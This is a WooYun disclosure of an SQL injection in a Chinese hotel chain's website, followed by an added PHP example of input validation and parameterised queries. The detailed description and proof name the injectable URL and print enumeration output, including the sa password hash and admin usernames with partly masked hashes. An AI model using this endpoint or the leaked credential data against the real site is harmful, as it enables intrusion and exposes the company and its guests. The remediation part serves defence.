Vulnerability Summary
Defect ID: wooyun-2013-039303
Title: Hotel chain #2: SQL injection in 尚客优酒店 (Thank You Inn) leaks a large volume of user information
Vendor: 尚客优连锁酒店
Author: 爱上平顶山
Submitted: 2013-10-10 17:21
Fix deadline: 2013-11-24 17:22
Disclosed: 2013-11-24 17:22
Vulnerability type: SQL injection
Severity: High
Self-assessed rank: 15
Status: Vendor could not be contacted, or vendor actively ignored the report
Source: http://www.wooyun.org; for questions or assistance contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2013-10-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not publicly disclosed
2013-11-24: Vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
0.0
Detailed description:
尚客优酒店
Point:
http://www.thankyou99.com/shop-list.php?type=2&id=11
D:\wamp\www\4006168169\shop-list.php
-----------------------------------------------------
available databases [7]:
[*] api
[*] master
[*] model
[*] msdb
[*] Ota
[*] tempdb
[*] ThankSql
[*] sa [1]:
password hash: 0x01004086ceb606ef267d5dd2c1d6214b1f3c735f768dfe9***
header: 0x0100
salt: 4086ceb6
mixedcase: 06ef267d5dd2c1d6214b1f3c735f768df***
Database: api
[11 tables]
+--------------------+
| dbo.WebPrice |
| dbo.cdb_hotel |
| dbo.cdb_hotel_pic |
| dbo.cdb_hotel_type |
| dbo.cdb_hr |
| dbo.cdb_ip |
| dbo.cdb_manager |
| dbo.cdb_members |
| dbo.cdb_shop |
| dbo.cdb_shopaddre |
| dbo.cdb_shoplist |
+--------------------+
Database: api
Table: dbo.cdb_manager
[4 entries]
+-----+------------+----------------------------------+
| uid | username | password |
+-----+------------+----------------------------------+
| 1 | hrthankyou | 747acb68a5feafb16e25421bebb*** |
| 2 | lithank | ef36215b9c60d0e0757358f88ef*** |
| 3 | thankktv | 982661e3837afd59eafdcd3105f*** |
| 4 | thankyou | dd6435ff277c869bf69a47c3984*** |
+-----+------------+----------------------------------+
--------------------------------------------------------
Database: Ota
[85 tables]
+-------------------+
| dbo.B_Account |
| dbo.B_Fee |
| dbo.B_Guest |
| dbo.B_Pay |
| dbo.B_cardback |
| dbo.B_cardsell |
| dbo.Book |
| dbo.Book2 |
| dbo.Book_Account |
| dbo.Book_Fee |
| dbo.Book_Guest |
| dbo.CardClub |
| dbo.CardMake |
| dbo.CardType |
| dbo.CardXuFei |
| dbo.Class |
| dbo.Country |
| dbo.Customer |
| dbo.DRbook |
| dbo.DRczl |
| dbo.DRoth |
| dbo.DRroom |
| dbo.DRsr |
| dbo.DRuse |
| dbo.DRvag |
| dbo.Employee |
| dbo.GongGao |
| dbo.Goods |
| dbo.GoodsClass |
| dbo.GuestType |
| dbo.LockShop |
| dbo.LockStatus |
| dbo.Log |
| dbo.Log2 |
| dbo.ManageFee |
| dbo.Nation |
| dbo.Operator |
| dbo.Operator2 |
| dbo.PricePlan |
| dbo.PrintSet |
| dbo.Regedit |
| dbo.Regedit2 |
| dbo.Room |
| dbo.RoomType |
| dbo.RoomType2 |
| dbo.SQLField |
| dbo.SQLset |
| dbo.ShopInf |
| dbo.SpeFile |
| dbo.Stock |
| dbo.Svc_Area |
| dbo.Svc_City |
| dbo.Svc_County |
| dbo.Svc_Dept |
| dbo.Svc_Ota |
| dbo.Svc_Ota_Grab |
| dbo.Svc_Ota_Order |
| dbo.Svc_Province |
| dbo.Svc_RoomType |
| dbo.Svc_Shop |
| dbo.Svc_User |
| dbo.Svc_WebPrice |
| dbo.System |
| dbo.System2 |
| dbo.System3 |
| dbo.TBSource |
| dbo.TelGuest |
| dbo.TelHis |
| dbo.Verson |
| dbo.WebPort |
| dbo.WebPort2 |
| dbo.WebPrice |
| dbo.WebRoom |
| dbo.YuePeng |
| dbo.book_account2 |
| dbo.book_fee2 |
| dbo.book_guest2 |
| dbo.cdb_members |
| dbo.data |
| dbo.heige |
| dbo.sfz |
| dbo.sj |
| dbo.telShop |
| dbo.temp |
| dbo.webBook |
+-------------------+
ok
Proof of vulnerability:
Database: Ota
[85 tables]
+-------------------+
| dbo.B_Account |
| dbo.B_Fee |
| dbo.B_Guest |
| dbo.B_Pay |
| dbo.B_cardback |
| dbo.B_cardsell |
| dbo.Book |
| dbo.Book2 |
| dbo.Book_Account |
| dbo.Book_Fee |
| dbo.Book_Guest |
| dbo.CardClub |
| dbo.CardMake |
| dbo.CardType |
| dbo.CardXuFei |
| dbo.Class |
| dbo.Country |
| dbo.Customer |
| dbo.DRbook |
| dbo.DRczl |
| dbo.DRoth |
| dbo.DRroom |
| dbo.DRsr |
| dbo.DRuse |
| dbo.DRvag |
| dbo.Employee |
| dbo.GongGao |
| dbo.Goods |
| dbo.GoodsClass |
| dbo.GuestType |
| dbo.LockShop |
| dbo.LockStatus |
| dbo.Log |
| dbo.Log2 |
| dbo.ManageFee |
| dbo.Nation |
| dbo.Operator |
| dbo.Operator2 |
| dbo.PricePlan |
| dbo.PrintSet |
| dbo.Regedit |
| dbo.Regedit2 |
| dbo.Room |
| dbo.RoomType |
| dbo.RoomType2 |
| dbo.SQLField |
| dbo.SQLset |
| dbo.ShopInf |
| dbo.SpeFile |
| dbo.Stock |
| dbo.Svc_Area |
| dbo.Svc_City |
| dbo.Svc_County |
| dbo.Svc_Dept |
| dbo.Svc_Ota |
| dbo.Svc_Ota_Grab |
| dbo.Svc_Ota_Order |
| dbo.Svc_Province |
| dbo.Svc_RoomType |
| dbo.Svc_Shop |
| dbo.Svc_User |
| dbo.Svc_WebPrice |
| dbo.System |
| dbo.System2 |
| dbo.System3 |
| dbo.TBSource |
| dbo.TelGuest |
| dbo.TelHis |
| dbo.Verson |
| dbo.WebPort |
| dbo.WebPort2 |
| dbo.WebPrice |
| dbo.WebRoom |
| dbo.YuePeng |
| dbo.book_account2 |
| dbo.book_fee2 |
| dbo.book_guest2 |
| dbo.cdb_members |
| dbo.data |
| dbo.heige |
| dbo.sfz |
| dbo.sj |
| dbo.telShop |
| dbo.temp |
| dbo.webBook |
+-------------------+
Remediation:
Filter the input.
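The one-word remediation above is correct but leaves the implementation open. The following PHP is an added example, not code from the site or from the report's author: it shows how a `shop-list.php`-style handler that takes `type` and `id` from the query string can validate both values as integers and pass them to SQL Server through a parameterised PDO statement, so that the values can never alter the statement's structure. The table name `dbo.cdb_shoplist`, the column names, the DSN, and the login are placeholders assumed for the example.

```php
<?php
// Added example (not the site's own code). Hardened handler for an endpoint
// that is called as shop-list.php?type=2&id=11.
// Assumptions: PDO with the sqlsrv driver; a table dbo.cdb_shoplist with
// integer columns type_id and shop_id. All names here are placeholders.

declare(strict_types=1);

function readIntParam(array $query, string $name, int $min = 1, int $max = PHP_INT_MAX): ?int
{
    // The "filtering" step: accept only a plain integer inside [$min, $max].
    // 'id=11' passes; anything carrying quotes, spaces or SQL keywords is
    // rejected before it reaches the database layer.
    if (!isset($query[$name])) {
        return null;
    }
    $value = filter_var($query[$name], FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    return $value === false ? null : $value;
}

function fetchShopList(PDO $db, int $type, int $id): array
{
    // Parameterised query: the SQL text is fixed, and the two values are sent
    // separately as typed parameters, so input cannot change the statement.
    $stmt = $db->prepare(
        'SELECT shop_id, shop_name FROM dbo.cdb_shoplist WHERE type_id = :type AND shop_id = :id'
    );
    $stmt->bindValue(':type', $type, PDO::PARAM_INT);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$type = readIntParam($_GET, 'type');
$id   = readIntParam($_GET, 'id');
if ($type === null || $id === null) {
    // Reject malformed input instead of interpolating it into SQL.
    http_response_code(400);
    exit('invalid parameters');
}

// Placeholder connection details. The login should be a dedicated,
// read-only account scoped to the one database the page needs, not sa.
$db = new PDO(
    'sqlsrv:Server=DB_HOST_PLACEHOLDER;Database=api',
    'app_reader',
    'PASSWORD_PLACEHOLDER',
    [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]
);

header('Content-Type: application/json');
echo json_encode(fetchShopList($db, $type, $id));
```

Two points from the report's own output motivate the design. First, `id` and `type` are numeric in the original URL, so integer validation alone already removes every injection payload for these parameters, and the prepared statement is the second, independent layer. Second, the enumeration reached `master`, `msdb` and the `sa` password hash, which is only possible when the web application's database login holds server-level privileges; a least-privilege login would have confined even a successful injection to the single application database.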
Copyright notice: please credit the source when reposting: 爱上平顶山@乌云
Vulnerability Response
Vendor response:
Vendor could not be contacted, or vendor actively declined to respond